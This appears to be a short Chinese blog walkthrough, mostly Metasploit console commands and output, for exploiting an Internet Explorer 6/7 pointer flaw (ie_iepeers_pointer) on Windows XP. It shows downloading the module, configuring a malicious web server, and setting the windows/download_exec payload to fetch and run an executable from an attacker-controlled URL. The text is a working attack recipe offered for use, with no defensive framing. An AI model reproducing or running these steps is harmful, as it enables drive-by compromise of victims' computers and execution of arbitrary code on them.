一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb
二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。改个名字叫ie.rb
三、启动msfconsole
四、msf > use exploit/test/ie

msf exploit(ie) > show optinos

回显：


Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080

msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec

msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.

msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.


然后打开http://192.168.0.3:8080/4rJ0JRSnX55wAY，你就可以看到源码了。

http://hi.baidu.com/isbx/blog/item/0001fd03ed754284d53f7c5d.html